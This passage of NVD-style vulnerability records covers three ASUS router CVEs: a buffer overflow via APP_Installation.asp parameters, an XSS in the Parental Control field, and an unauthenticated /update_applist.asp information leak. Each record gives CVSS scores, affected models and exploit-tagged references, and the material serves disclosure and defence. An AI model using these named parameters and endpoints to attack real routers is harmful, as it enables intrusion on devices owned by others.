buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp." }, { "lang": "es", "value": "M\u00faltiples desbordamientos de b\u00fafer en web.c de httpd en routers ASUS RT-N56U y RT-AC66U con firmware 3.0.0.4.374_979 permite a atacantes remotos ejecutar c\u00f3digo arbitrario a trav\u00e9s de par\u00e1metros (1) apps_name o (2) apps_flag hacia APP_Installation.asp." } ], "id": "CVE-2013-6343", "lastModified": "2024-11-21T01:59:02.770", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ] }, "published": "2014-01-22T05:22:12.737", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html" }, { "source": "cve@mitre.org", "url": "http://osvdb.org/102267" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://www.exploit-db.com/exploits/31033" }, { "source": "cve@mitre.org", "url": "http://www.securityfocus.com/bid/65046" }, { "source": "cve@mitre.org", "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "http://osvdb.org/102267" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://www.exploit-db.com/exploits/31033" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "http://www.securityfocus.com/bid/65046" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://support.t-mobile.com/docs/DOC-21994" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-119" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68 | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68 | Exploit, Third Party Advisory |
Vendor | Product | Version | |
---|---|---|---|
asus | rt-ac66u_firmware | 3.0.0.4.372_67 | |
asus | rt-ac66u | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:3.0.0.4.372_67:*:*:*:*:*:*:*", "matchCriteriaId": "2968E5E9-618F-4982-8E22-205C7B12BDA8", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "ASUS WRT-AC66U 3 RT 3.0.0.4.372_67 devices allow XSS via the Client Name field to the Parental Control feature." }, { "lang": "es", "value": "Los dispositivos ASUS WRT-AC66U 3 RT versi\u00f3n 3.0.0.4.372_67, permiten un ataque de tipo XSS por medio del campo Client Name en la funcionalidad Parental Control." } ], "id": "CVE-2020-7997", "lastModified": "2024-11-21T05:38:10.003", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-01-28T05:15:11.447", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-79" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://starlabs.sg/advisories/18-20333/ | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://starlabs.sg/advisories/18-20333/ | Exploit, Third Party Advisory |
Vendor | Product | Version | |
---|---|---|---|
asus | asuswrt | 3.0.0.4.384.20308 | |
asus | gt-ac2900 | - | |
asus | gt-ac5300 | - | |
asus | gt-ax11000 | - | |
asus | rt-ac1200 | - | |
asus | rt-ac1200_v2 | - | |
asus | rt-ac1200g | - | |
asus | rt-ac1200ge | - | |
asus | rt-ac1750 | - | |
asus | rt-ac1750_b1 | - | |
asus | rt-ac1900p | - | |
asus | rt-ac3100 | - | |
asus | rt-ac3200 | - | |
asus | rt-ac51u | - | |
asus | rt-ac5300 | - | |
asus | rt-ac55u | - | |
asus | rt-ac56r | - | |
asus | rt-ac56s | - | |
asus | rt-ac56u | - | |
asus | rt-ac66r | - | |
asus | rt-ac66u | - | |
asus | rt-ac66u-b1 | - | |
asus | rt-ac66u_b1 | - | |
asus | rt-ac68p | - | |
asus | rt-ac68u | - | |
asus | rt-ac86u | - | |
asus | rt-ac87u | - | |
asus | rt-ac88u | - | |
asus | rt-acrh12 | - | |
asus | rt-acrh13 | - | |
asus | rt-ax3000 | - | |
asus | rt-ax56u | - | |
asus | rt-ax58u | - | |
asus | rt-ax88u | - | |
asus | rt-ax92u | - | |
asus | rt-g32 | - | |
asus | rt-n10\+d1 | - | |
asus | rt-n10e | - | |
asus | rt-n14u | - | |
asus | rt-n16 | - | |
asus | rt-n19 | - | |
asus | rt-n56r | - | |
asus | rt-n56u | - | |
asus | rt-n600 | - | |
asus | rt-n65u | - | |
asus | rt-n66r | - | |
asus | rt-n66u | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:asuswrt:3.0.0.4.384.20308:*:*:*:*:*:*:*", "matchCriteriaId": "4F4DB439-E9CC-4BA5-9A05-B51BF8DCD038", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:gt-ac2900:-:*:*:*:*:*:*:*", "matchCriteriaId": "B581C286-7C47-42BF-8876-243285409374", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:gt-ac5300:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D2B9867-7DA3-4221-9148-36FD412FA993", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:gt-ax11000:-:*:*:*:*:*:*:*", "matchCriteriaId": "CC02F598-C10E-4C77-9BE9-CB3660893C5E", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200:-:*:*:*:*:*:*:*", "matchCriteriaId": "9BE19DF1-EB89-4CE5-956F-79BD4AD5E52F", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200_v2:-:*:*:*:*:*:*:*", "matchCriteriaId": "80BBA2CB-3DD3-4A8F-9556-E845AFAB2043", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200g:-:*:*:*:*:*:*:*", "matchCriteriaId": "1CF74439-AD6D-4BBB-9254-640170FE1CF3", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200ge:-:*:*:*:*:*:*:*", "matchCriteriaId": "2078161F-17EB-45EE-BCE9-C86B3860FD5C", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1750:-:*:*:*:*:*:*:*", "matchCriteriaId": "59001E8D-E835-464A-915A-AAF59F2F397F", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1750_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "51FC355D-5C81-4041-B649-EB271CA55AFD", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1900p:-:*:*:*:*:*:*:*", "matchCriteriaId": "F1E5EEF4-D19B-41D1-86B6-F2CBB745570E", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac3100:-:*:*:*:*:*:*:*", "matchCriteriaId": "B9B17C2B-A1EC-4FC1-8AB1-F35D9E3A0AA2", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac3200:-:*:*:*:*:*:*:*", "matchCriteriaId": "AFE8A3B1-284B-40EC-872E-B8F7103F108C", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac51u:-:*:*:*:*:*:*:*", "matchCriteriaId": "24748D40-7F43-44DA-BBEF-46D85D2AADA3", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac5300:-:*:*:*:*:*:*:*", "matchCriteriaId": "55EE62D6-1E29-4E84-8944-D3D68E212140", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac55u:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C7DF43D-7EEE-405C-BB2B-822936BCB4A0", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac56r:-:*:*:*:*:*:*:*", "matchCriteriaId": "E32874C8-05B6-44A1-B118-DC2F4FE62134", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac56s:-:*:*:*:*:*:*:*", "matchCriteriaId": "63A1E548-F12D-4BF7-9C01-1325A725FF91", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3E87BA7-FACD-46B2-BE2A-9EFEA3C62C17", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66r:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D59C40A-D9BA-455B-9F9E-D3B6FB80BC13", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66u-b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "CD103F76-C432-4577-8465-831E0314D8D4", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66u_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F6B0EC4-797D-4059-AA90-EC09A49FE105", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac68p:-:*:*:*:*:*:*:*", "matchCriteriaId": "5713F0F3-B616-42B7-A0D8-7983F00E79FE", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac68u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E23D00B-76E3-438C-8023-3D7CC6AEEE15", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac86u:-:*:*:*:*:*:*:*", "matchCriteriaId": "89095282-ABBD-4056-B731-7F05638DB1A6", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac87u:-:*:*:*:*:*:*:*", "matchCriteriaId": "317B2498-88CE-431F-97E1-EFE7F7E34E05", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac88u:-:*:*:*:*:*:*:*", "matchCriteriaId": "81008E66-B5E8-4DE5-B14D-E6983C69BC29", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-acrh12:-:*:*:*:*:*:*:*", "matchCriteriaId": "1EF9FF00-2DDC-4900-8A93-A51E41EA5C17", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-acrh13:-:*:*:*:*:*:*:*", "matchCriteriaId": "41AF79B6-D208-4357-A08D-D1AB6F136F59", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "1515AF83-732F-489B-A25C-5D67A03A3B25", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D747097-702E-4046-9723-01A586336534", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax58u:-:*:*:*:*:*:*:*", "matchCriteriaId": "855509B2-CE29-4A04-B412-C160139EA392", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax88u:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB91E047-5AE1-4CA0-9E67-84170D79770C", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax92u:-:*:*:*:*:*:*:*", "matchCriteriaId": "8EB70155-390A-472E-A0AA-59A18ADD2BF5", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-g32:-:*:*:*:*:*:*:*", "matchCriteriaId": "5AD16BBF-DB02-4E96-A310-82C13898B29D", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n10\\+d1:-:*:*:*:*:*:*:*", "matchCriteriaId": "B8794D4A-5E8C-432D-A2FB-9CF86158E8D5", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n10e:-:*:*:*:*:*:*:*", "matchCriteriaId": "9AFCC588-AAA6-45FA-8D1F-E57C7693D27A", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n14u:-:*:*:*:*:*:*:*", "matchCriteriaId": "85B0C29C-29A5-4659-8D76-9241B13682DF", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n16:-:*:*:*:*:*:*:*", "matchCriteriaId": "3E016FE0-0A28-49AA-A213-38A5F7728FE2", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n19:-:*:*:*:*:*:*:*", "matchCriteriaId": "507A5D4D-CAF9-4417-9EA6-B499E04D1CDD", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n56r:-:*:*:*:*:*:*:*", "matchCriteriaId": "14C092D3-14B2-4DBB-8C20-D15F0BA33FA8", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "534C0C95-9DD2-464C-8776-01B47398FE13", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n600:-:*:*:*:*:*:*:*", "matchCriteriaId": "481C7F6F-23A4-4B8B-8E14-44ADFCBE8C58", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n65u:-:*:*:*:*:*:*:*", "matchCriteriaId": "B5567C97-0AE2-429B-B4D7-1CF501BD2C07", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n66r:-:*:*:*:*:*:*:*", "matchCriteriaId": "EB4466BA-09EB-43F0-9610-6574F10B5810", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "7A60BB38-11FC-48C4-B592-29C6C3A6FEAE", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can request /update_applist.asp to see if a USB device is attached to the router and if there are apps installed on the router." }, { "lang": "es", "value": "Se detect\u00f3 un problema en ASUSWRT versi\u00f3n 3.0.0.4.384.20308. Un usuario no autenticado puede solicitar el archivo /update_applist.asp para visualizar si un dispositivo USB se encuentra adjunto al enrutador y si hay aplicaciones instaladas en el enrutador." } ], "id": "CVE-2018-20333", "lastModified": "2024-11-21T04:01:15.320", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-03-20T01:15:22.267", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://starlabs.sg/advisories/18-20333/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://starlabs.sg/advisories/18-20333/" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-200" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }